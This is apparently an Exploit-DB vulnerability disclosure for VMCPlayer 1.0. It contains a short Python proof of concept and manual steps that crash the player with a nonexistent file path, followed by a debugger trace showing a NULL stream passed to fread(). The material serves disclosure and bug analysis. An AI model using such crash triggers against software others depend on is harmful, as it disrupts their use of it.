VMCPlayer 1.0 – Denial of Service

  • 作者: BraniX
    日期: 2011-03-23
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/17032/
  • # done by BraniX <branix@hackers.org.pl>
    # www.hackers.org.pl
    # found: 2011.03.22
    # published: 2011.03.22
    # tested on: Windows XP SP3 Home Edition
    # App: VMCPlayer 1.0
    # App Url: http://files.videomobileconverter.com/vmcplayer.exe
    # VMCPlayer.exe MD5: 8a98ffbb404731f8f5ffbf3eaf30a327
    # VMCPlayer can be DoS'ed in two (or probably more) ways
    # 1. [No user interaction required] Pass invalid file path during start-up process
    # 2. [User interaction required] Manually enter invalid file name to OpenFileDialog 
    import os
    path = '"C:\\Program Files\\VideoMobileConverter\\VMCPlayer\\VMCPlayer.exe"'
    print "Trying to start VMCPlayer from path:"
    print path
    print "No user actions are required (OK, one is - click OK in MessageBox ;) )"
    os.system(path + " ImAGhostFilePickMe")
    print "Done, if nothing happened update VMCPlayer path in PY file ;)"
    How to DoS VMCPlayer 1.0
    1. Start VMCPlayer
    2. Click button 'Open video'
    3. (DO NOT PICK A FILE) In file name TextBox enter 'IHaveNoSuchFile' or other non-existing file name :)
    4. 'Open' non-existing file
    5. You have DoS
    What happened?
    Null pointer was passed to fread() function as a FILE* stream which caused DoS
    size_t fread ( void * ptr, size_t size, size_t count, FILE * stream );
    00409EE0 Main MOV EAX,DWORD PTR DS:[ECX+8]; EAX=00000000
    00409EE3 Main MOV ECX,DWORD PTR SS:[ESP+8]; ECX=00008000
    00409EE7 Main MOV EDX,DWORD PTR SS:[ESP+4]; EDX=023D5F08
    00409EEB Main PUSH EAX; stream = NULL; ESP=0012E87C
    00409EEC Main PUSH ECX; n = 8000 (32768.); ESP=0012E878
    00409EED Main PUSH 1; size = 1; ESP=0012E874
    00409EEF Main PUSH EDX; ptr = 023D5F08; ESP=0012E870
    00409EF0 Main CALL DWORD PTR DS:[<&MSVCR80.fread>]; ESP=0012E86C
    Exception was not handled by user's code, so application was forced to close 
    781389EF Main CALL DWORD PTR DS:[<&KERNEL32.IsDebuggerPresent>]; EAX=00000001
    781389F5 Main PUSH 0; ESP=0012E4D8
    781389F7 Main MOV ESI,EAX ; ESI=00000001
    781389F9 Main CALL DWORD PTR DS:[<&KERNEL32.SetUnhandledExceptionFilter>]; FL=PZ, EAX=0040C6FE, ECX=00008289, EDX=7C90E514, ESP=0012E4DC
    781389FF Main LEA EAX,DWORD PTR SS:[EBP-30] ; EAX=0012E530
    78138A02 Main PUSH EAX; ESP=0012E4D8
    78138A03 Main CALL DWORD PTR DS:[<&KERNEL32.UnhandledExceptionFilter>]; EAX=00000000, ECX=7C864938, ESP=0012E4DC
    78138A09 Main TEST EAX,EAX
    78138A0B Main JNZ SHORT MSVCR80.78138A19
    78138A0D Main TEST ESI,ESI; FL=0
    78138A0F Main JNZ SHORT MSVCR80.78138A19
    78138A19 Main PUSH C000000D ; ESP=0012E4D8
    78138A1E Main CALL DWORD PTR DS:[<&KERNEL32.GetCurrentProcess>]; FL=PS, EAX=FFFFFFFF
    78138A24 Main PUSH EAX; ESP=0012E4D4
    78138A25 Main CALL DWORD PTR DS:[<&KERNEL32.TerminateProcess>]; FL=P, EAX=00000000, ECX=0039B9B8, EBX=00000000, ESP=022AFF70,